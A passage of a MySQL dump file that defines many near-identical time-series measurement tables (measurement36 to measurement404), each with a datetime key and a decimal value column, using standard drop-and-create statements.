`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement352`
--
DROP TABLE IF EXISTS `measurement352`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement352` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement353`
--
DROP TABLE IF EXISTS `measurement353`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement353` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement354`
--
DROP TABLE IF EXISTS `measurement354`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement354` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement355`
--
DROP TABLE IF EXISTS `measurement355`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement355` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement356`
--
DROP TABLE IF EXISTS `measurement356`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement356` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement357`
--
DROP TABLE IF EXISTS `measurement357`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement357` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement358`
--
DROP TABLE IF EXISTS `measurement358`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement358` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement359`
--
DROP TABLE IF EXISTS `measurement359`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement359` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement36`
--
DROP TABLE IF EXISTS `measurement36`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement36` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement360`
--
DROP TABLE IF EXISTS `measurement360`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement360` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement361`
--
DROP TABLE IF EXISTS `measurement361`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement361` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement362`
--
DROP TABLE IF EXISTS `measurement362`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement362` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement363`
--
DROP TABLE IF EXISTS `measurement363`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement363` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement364`
--
DROP TABLE IF EXISTS `measurement364`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement364` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement365`
--
DROP TABLE IF EXISTS `measurement365`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement365` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement366`
--
DROP TABLE IF EXISTS `measurement366`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement366` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement367`
--
DROP TABLE IF EXISTS `measurement367`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement367` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement368`
--
DROP TABLE IF EXISTS `measurement368`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement368` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement369`
--
DROP TABLE IF EXISTS `measurement369`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement369` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement37`
--
DROP TABLE IF EXISTS `measurement37`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement37` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement370`
--
DROP TABLE IF EXISTS `measurement370`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement370` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement371`
--
DROP TABLE IF EXISTS `measurement371`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement371` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement372`
--
DROP TABLE IF EXISTS `measurement372`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement372` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement373`
--
DROP TABLE IF EXISTS `measurement373`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement373` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement374`
--
DROP TABLE IF EXISTS `measurement374`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement374` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement375`
--
DROP TABLE IF EXISTS `measurement375`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement375` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement376`
--
DROP TABLE IF EXISTS `measurement376`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement376` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement377`
--
DROP TABLE IF EXISTS `measurement377`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement377` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement378`
--
DROP TABLE IF EXISTS `measurement378`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement378` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement379`
--
DROP TABLE IF EXISTS `measurement379`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement379` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement38`
--
DROP TABLE IF EXISTS `measurement38`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement38` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement380`
--
DROP TABLE IF EXISTS `measurement380`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement380` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement381`
--
DROP TABLE IF EXISTS `measurement381`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement381` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement382`
--
DROP TABLE IF EXISTS `measurement382`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement382` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement383`
--
DROP TABLE IF EXISTS `measurement383`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement383` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement384`
--
DROP TABLE IF EXISTS `measurement384`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement384` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement385`
--
DROP TABLE IF EXISTS `measurement385`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement385` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement386`
--
DROP TABLE IF EXISTS `measurement386`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement386` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement387`
--
DROP TABLE IF EXISTS `measurement387`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement387` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement388`
--
DROP TABLE IF EXISTS `measurement388`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement388` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement389`
--
DROP TABLE IF EXISTS `measurement389`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement389` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement39`
--
DROP TABLE IF EXISTS `measurement39`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement39` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement390`
--
DROP TABLE IF EXISTS `measurement390`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement390` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement391`
--
DROP TABLE IF EXISTS `measurement391`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement391` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement392`
--
DROP TABLE IF EXISTS `measurement392`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement392` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement393`
--
DROP TABLE IF EXISTS `measurement393`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement393` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement394`
--
DROP TABLE IF EXISTS `measurement394`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement394` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement395`
--
DROP TABLE IF EXISTS `measurement395`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement395` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement396`
--
DROP TABLE IF EXISTS `measurement396`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement396` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement397`
--
DROP TABLE IF EXISTS `measurement397`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement397` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement398`
--
DROP TABLE IF EXISTS `measurement398`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement398` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement399`
--
DROP TABLE IF EXISTS `measurement399`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement399` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement4`
--
DROP TABLE IF EXISTS `measurement4`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement4` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement40`
--
DROP TABLE IF EXISTS `measurement40`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement40` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement400`
--
DROP TABLE IF EXISTS `measurement400`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement400` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement401`
--
DROP TABLE IF EXISTS `measurement401`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement401` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement402`
--
DROP TABLE IF EXISTS `measurement402`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement402` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement403`
--
DROP TABLE IF EXISTS `measurement403`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement403` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement404`
--
DROP TABLE IF EXISTS `measurement404`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement404` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement41`
--
DROP TABLE IF EXISTS `measurement41`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement41` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement42`
--
DROP TABLE IF EXISTS `measurement42`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement42` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement43`
--
DROP TABLE IF EXISTS `measurement43`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement43` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement44`
--
DROP TABLE IF EXISTS `measurement44`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
